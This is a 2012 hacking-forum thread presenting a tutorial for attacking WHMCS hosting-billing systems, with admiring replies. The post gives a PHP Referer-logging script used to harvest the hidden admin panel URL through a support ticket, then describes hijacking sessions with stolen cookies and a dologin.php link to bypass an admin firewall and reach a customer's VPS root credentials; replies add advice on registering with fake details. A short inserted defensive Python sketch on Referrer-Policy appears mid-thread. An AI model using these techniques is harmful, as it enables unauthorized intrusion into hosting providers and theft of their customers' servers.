WHMCS Trick'z With XSS And Ref Link & rOoTiNg wiTh0u7 pAnEL

09-26-2012, 06:25 PM #1
b0x Offline b0x *******
Administrators
Posts:78 Threads:34 Joined:Jul 2012 Reputation: 4
Mood: None
Hello Mad'z

How Are You Brother'z ?

Today ,,We're Going To Get Admin Panel Link OF WHMCS

We Need PHP File

PHP Code:
<?php 
# Admin Link Finder Via XSS 
# Don't Forget To Inject Code :) 
# WWW.SEC4EVER.COM 
#404 
echo "404 Page Not Found"
$url $_SERVER['HTTP_REFERER']; 
$urlx = @fopen("URL.txt","w"); 
@
fwrite($urlx,"====================================================================== 
URL/Admin Panel : 
$url 
====================================================================== 
"
); 
?>

This Code We Need .. Now Upload it For AnyServer And Just

Submit New Ticket In WHMCS To Support Admin And Send Link OF PHP File Like This You CAn Make Message

Code:
Hello

I Need To Make Like This Site
http://site.tld/file.php

waiting support
thanks
H4x0r

oke this message contains
http://site.tld/file.php
this is ouR coDe to inject oke now go to see URL.txt FIle

[Image: Nup09644.png]:P

This Was The 1st Trick xP

The 2Nd Trick Is After XSS Codes ,, We Always Get Cookie But We See Firewall On Admin Panel
Like This

[Image: gxj10095.png]

So Here We're

We Want To Bypass This Firewall And Get Root To X Client

Assume We've This Information

Cookiez

Code:
PHPSESSID=34820c5cad7Da21205091c36b749D085

E-Mail OF Client

Code:
[email protected]

We Can Get Cookies From XSS / Xss-Shell <Browser Attack> Or Any HTML Injection, That's Not Matter
E-Mail OF Client We Can Get it From WHo IS Service OF Domain / Target

Now We've To Check if The Email Address Is correct or incorrect

Request Reset Password

[Image: Ked10893.png]
And Here Put E-Mail To Check


if you get message with E-Mail Sent ,, So E-Mail Address is Correct

[Image: yM310980.png]
E-Mail Is Correct # Zuhahah =))

Now We'll Put Cookies in Browser ,, I'm Using FireFox With FireBug/Fire Co()kie Addon

[Image: nAZ11269.png]
[Image: f5T11298.png]

Create C00kie And Put As We've Then Type F5

And You'll Get iN The Top of Page

[Image: eGO11421.png]

But The Problem Now We Can't Access Admin Panel Because OF Fire Wall

Oke Our Magic Is found

Now Use This Link

http://site.tld/whmcs/dologin.php?u s e r n a m [email protected]

Don't Use Spaces In u$ername But I Used Because OF Security

So You'll Be In ClientArea Now

[Image: CZW12352.png]
Discover The Services And Product'z

[Image: zUz12272.png]

It's VPS, Go 2 View Detail'z

[Image: 8ix12498.png]

Root Access Is ready =))

Just Say Zuhahahaha

Zuhahahaha ,,, We Got it Greet'z

h4x0rl1f3
shadow008
1337
Dr.Zombie
KhantastiC
TNT_HACKER
Th3 MMA
Zombie_KSA
Spiral
I-Hmx
Sec4ever
MadLeets

./b0x
Www://MadLeets.CoM
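
Added example, not part of b0x's post: the first trick above works only when the staff browser sends the full ticket-page URL as the Referer to the linked site. This Python sketch, simplified from the W3C Referrer Policy rules, computes what each `Referrer-Policy` value would send so the admin path exposure can be checked per policy; `ADMIN_PAGE` and its host are constructed sample values, and a downgrade is treated as plain https to http.

```python
from urllib.parse import urlsplit, urlunsplit

def _origin(u):
    """(scheme, host, port) tuple used for the same-origin comparison."""
    p = urlsplit(u)
    default = {"http": 80, "https": 443}.get(p.scheme)
    return (p.scheme, p.hostname, p.port or default)

def _strip(u, origin_only=False):
    """Drop userinfo and fragment; optionally reduce to scheme://host[:port]/."""
    p = urlsplit(u)
    host = p.hostname or ""
    if p.port:
        host += f":{p.port}"
    if origin_only:
        return urlunsplit((p.scheme, host, "/", "", ""))
    return urlunsplit((p.scheme, host, p.path or "/", p.query, ""))

def referer_sent(policy, page_url, link_url):
    """Return the Referer value a browser sends when a link on page_url
    pointing to link_url is followed, or None if the header is omitted.
    Simplification (assumption): a downgrade means https -> http."""
    same = _origin(page_url) == _origin(link_url)
    downgrade = urlsplit(page_url).scheme == "https" and urlsplit(link_url).scheme == "http"
    full, origin = _strip(page_url), _strip(page_url, origin_only=True)
    if policy == "no-referrer":
        return None
    if policy == "unsafe-url":
        return full
    if policy == "origin":
        return origin
    if policy == "same-origin":
        return full if same else None
    if policy == "origin-when-cross-origin":
        return full if same else origin
    if policy == "no-referrer-when-downgrade":
        return None if downgrade else full
    if policy == "strict-origin":
        return None if downgrade else origin
    if policy == "strict-origin-when-cross-origin":
        if same:
            return full
        return None if downgrade else origin
    raise ValueError(f"unknown policy: {policy}")

# Constructed sample: a staff ticket view under a renamed admin directory.
ADMIN_PAGE = "https://billing.example/whmcs/hidden-admin-dir/supporttickets.php?action=view&id=7"
TICKET_LINK = "http://site.tld/file.php"
```

Sending `Referrer-Policy: no-referrer` (or `same-origin`) on admin responses removes the header for off-site links. Under `strict-origin-when-cross-origin` only the origin is sent, not the admin path.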

09-26-2012, 06:30 PM #2
1337 Offline Don't PM me for help, post it on forum ! *******
Administrators
Posts:520 Threads:106 Joined:Jun 2012 Reputation: 21
Mood: Hacker
Hahahahahahahahahahahahaha
Just Awesome Bro

09-26-2012, 06:30 PM #3
H4x0rl1f3 Offline Commander In Cheif *******
Administrators
Posts:1,126 Threads:25 Joined:Jun 2012 Reputation: 15
Mood: Stoned
That's way to sexy and full with Madness UnderTaker
Awesome shit

Always Aspect Reward from the Creator and not anyone or anything Created.
For Complaints & Help Contact:- [email protected]
Zone-h
http://zone-h.org/archive/notifier=H4x0rL1f3
I am the orphan of Gaza & Kashmir. Ruins of Iraq,Syria & Palestine Bombarded of Pakistan,Afghanistan, Mali & Yemen Change of Libya and Egypt Discriminated of Bahrain & Turkey Freedom of Earth's paradise and Al-AQSA. I am the hunger stricken child of Somalia, Ethopia, & rest of Africa I am the suffering of each and every single corner of the world. But Listen!!! Hope is what I am!!


09-26-2012, 06:46 PM #4
SpOiler Offline Junior Member **
Registered
Posts:44 Threads:0 Joined:Jun 2012 Reputation: 0
Mood: None
Aweso0000me

09-26-2012, 06:46 PM #5
Lnxr00t Offline MadLeets Vip ******
V.I.P
Posts:51 Threads:4 Joined:Jun 2012 Reputation: 0
Mood: None
Awesome tut.

09-26-2012, 07:02 PM #6
Pain006 Offline Super Moderator ******
Super Moderators
Posts:575 Threads:28 Joined:Jun 2012 Reputation: 0
Mood: None
Great B0x

09-26-2012, 07:10 PM #7
Darksnipper Offline Junior Administrator **********
Junior Administrator
Posts:639 Threads:77 Joined:Jun 2012 Reputation: 4
Mood: None
1 thng some whmcs have login to submit ticket bro
for those any method to submit ticket

Visit My Site:-http://www.1337coders.org
[email protected]

09-26-2012, 07:17 PM #8
H4x0rl1f3 Offline Commander In Cheif *******
Administrators
Posts:1,126 Threads:25 Joined:Jun 2012 Reputation: 15
Mood: Stoned
(09-26-2012, 07:10 PM)darksnipper Wrote:  1 thng some whmcs have login to submit ticket bro
for those any method to submit ticket
well 99 % register users can submit, so you don't need to actually buy anything just register on web with fake info and submit
enjoy



09-26-2012, 07:19 PM #9
Darksnipper Offline Junior Administrator **********
Junior Administrator
Posts:639 Threads:77 Joined:Jun 2012 Reputation: 4
Mood: None
okz thanx let me try it

1 mre questioN
MUST THE WHMCS Vul to xsS?


09-26-2012, 08:25 PM #10
THE RUDE Offline Respected *****
Respected
Posts:40 Threads:3 Joined:Jun 2012 Reputation: 0
Mood: None
its a GOD gifted exploit and its very nice bro
thanks





